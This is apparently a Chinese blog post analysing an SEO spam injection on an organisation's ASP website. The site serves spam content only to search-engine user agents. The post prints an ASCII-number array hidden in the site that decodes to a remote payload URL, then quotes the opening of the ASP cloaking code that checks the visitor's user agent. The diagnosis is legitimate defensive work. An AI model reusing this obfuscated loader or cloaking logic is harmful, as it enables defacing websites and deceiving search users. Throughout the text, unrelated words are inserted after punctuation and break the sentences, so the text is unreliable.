患者:某單位某二級部門網(wǎng)站
癥狀:正常訪問無大礙,百度快照訪問頁面中雜有不可描述之內容悍抑。
其他癥狀:主機win server 2003鳄炉,ASP,ACCESS传趾,密碼明文迎膜,登陸日志黑點滿滿。
病癥:User-Agent偽裝成Baiduspider蟲浆兰,訪問到被篡改頁面磕仅;正常訪問珊豹,正常顯示(掃描設備成擺設-_-!!!)。由上推斷被植入SEO黑鏈無疑了榕订。
偽處方:這樣的server店茶,這樣的網(wǎng)站,修修上線算了
? ? 1劫恒、嘗試不同的UserAgent贩幻,當UserAgent中包含baidu、spider两嘴、360丛楚、so、yahoo憔辫、google關鍵字時趣些,問題依舊(=_=!!,有些‘歸化’引擎bing不能入眼)贰您。
? ? 2坏平、顯然是網(wǎng)站后臺被插入了惡意代碼所致,邏輯該是接收到訪問請求后锦亦,先判斷UserAgent中是否包含上述關鍵字舶替,若包含則將不可描述內容加入到頁面中。在網(wǎng)站后臺文件中查找包含Agent關鍵字的文件杠园,無果顾瞪;繼而查找關鍵字(baidu,spider,360...),依然無果~~~?
? ? 3返劲、根據(jù)篡改頁面手動排查玲昧,找到一段:cft=array(104,116,116,112,58,47,47,101,46,102,105,97,107,99,46,105,110,58,53,47,99,102,46,116,120,116)
? ? 4、asii碼篮绿,轉換孵延,來了個http地址,http://e.fiakc.in:5/cf.txt亲配,? 打開尘应,瞅到這段萬惡之源。
????????????Dim robots:robots="aidu|oogle|ia_arch|snbot|ahoo|so|haosou|spider"
????????????l1=request.servervariables("http_user_agent")
